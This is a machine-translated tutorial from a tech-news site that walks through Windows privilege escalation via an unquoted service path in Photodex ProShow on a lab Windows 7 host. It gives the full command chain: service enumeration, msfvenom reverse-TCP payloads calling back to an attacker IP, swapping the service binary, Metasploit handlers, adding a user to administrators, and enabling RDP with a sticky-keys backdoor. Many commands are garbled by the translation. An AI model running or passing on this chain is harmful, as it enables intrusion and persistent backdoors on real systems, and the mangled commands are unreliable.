Shulou(Shulou.com)06/02 Report--

This article is to share with you about how to increase rights under the Windows platform. The editor thinks it is very practical, so share it with you as a reference and follow the editor to have a look.

No quotation mark service path vulnerability

This vulnerability is related to the path of the executable file. If there is a space in the file name, or if the file path is not wrapped in double quotes, the attacker can replace the legitimate exe file with a malicious exe file and claim rights.

Environment building

Target host: Windows 7

Attacking host: Kali Linux

First, we need to download and install an application with vulnerabilities called photodex proshow on the target Windows system, and the download image can be found on Exploit DB.

Generate the target host

In order to get the meterpreter session, we need to successfully invade the target Windows device at least once. As you can see in the following figure, we have got the meterpreter session of the target host. Now, open the command Shell:

Shell

As you can see, the shell access we got is the local user local_user. In order to get the administrator rights of cmd, we need to raise the rights. First, we can enumerate all the services running on the target host and find out the service paths that are not wrapped in double quotation marks, which can be done with the following command:

Wmic service get name,displayname,pathname,startmode | findstr / I "auto" | findstr / I / v "c:\ windows\" | findstr / I / v ""

Here, we enumerate the following paths:

C:\ ProgramFiles\ Photodex\ ProShow Producer\ Scsiaccess.exe

This path is not wrapped in double quotation marks, and there is a space in the file name.

Now we need to identify the file directory permissions using the following command:

Icacls Scsiaccess.exe

As you can see, it provides write access to anyone, which means that any user can rewrite the file:

Empowering through process migration

Now, we just need to put the malicious exe in the same folder, and it automatically has administrator privileges, and when the service restarts, Windows will start the malicious exe.

Open the terminal in Kali Linux and generate a malicious exe Payload using msfvenom with the following command:

Msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234prependmigrate=true prepenmigrateprocess=explorer.exe-f exe > / root/Desktop/scsiaccess.exe

The above command generates a malicious exe file on the desktop and then sends it to the target host. Payload attempts to migrate malicious processes, and if the user terminates the current process through the process ID, the attacker will not lose control of the session and Payload.

Now, replace the legitimate executable file with malicious exe. Here, I renamed the legitimate Scsiaccess.exe to Scsiaccess.exe.orginal, uploaded the malicious Scsiaccess.exe to the same folder, and then restarted the target host:

Movescsiaccess.exe scsiaccess.exe.orginalupload/root/Desktop/ scsiaccess.exe

Reboot:

At the same time, I opened several handler listeners in my new terminal to capture meterpreter sessions:

Use exploit/multi/handlermsf exploit (multi/handler) set payload windows / meterpreter/reverse_tcpmsf exploit (multi/handler) set lhost 192.168.1.107msf exploit (multi/handler) set lport 1234msf exploit (multi/handler) exploit

After a while, we can get the shell with administrator privileges:

Rights enhancement is achieved by adding administrators group users

Once the shell is generated with local_user privileges, we can enumerate the complete list of user names without administrator privileges. Here we find that user raaz is not a member of the administrators group:

Net usernet user raaz

Similarly, we generate an exe file and use it to add the user raaz to the administrators group, and the malicious exe file name we generate is still called Scsiaccess.exe:

Msfvenom-p windows/exec CMD='net localgroup administrators raaz / add'-f exe > / root/Desktop/scsiaccess.exe

Repeat the above steps to replace the legitimate exe in the same directory with a malicious exe file, and then restart the target host:

If you take a closer look at the screenshot below, you will find that user raaz has become a member of the administrators group:

To increase rights through RDP&Sticky_key.

Use msfvenom to generate an exe file with the same filename (Scsiaccess.exe), then send it to the target host, and open multiple listeners with the autorun script, which will enable the RDP service:

Use exploit/multi/handlermsf exploit (multi/handler) set payload windows/ meterpreter/reverse_tcpmsf exploit (multi/handler) set lhost 192.168.1.107msf exploit (multi/handler) set lport 1234msf exploit (multi/handler) set AutoRunScript post/windows/manage/enable_rdpmsf exploit (multi/handler) exploit

Similarly, when the target service is restarted, we can set the autorun script to enable sticky_keys:

Msf exploit (multi/handler) set AutoRunScript post/windows/manage/sticky_keysmsf exploit (multi/handler) run

As you can see from the following figure, the command opens another meterpreter session (session 3), which has administrator privileges, and we can now establish a connection to the target host through RDP:

Rdp 192.168.1.101

Next, press the shift key five times in a row and you will get a command line window with administrator privileges:

Thank you for reading! This is the end of the article on "how to raise Rights under the Windows platform". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, you can share it for more people to see!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.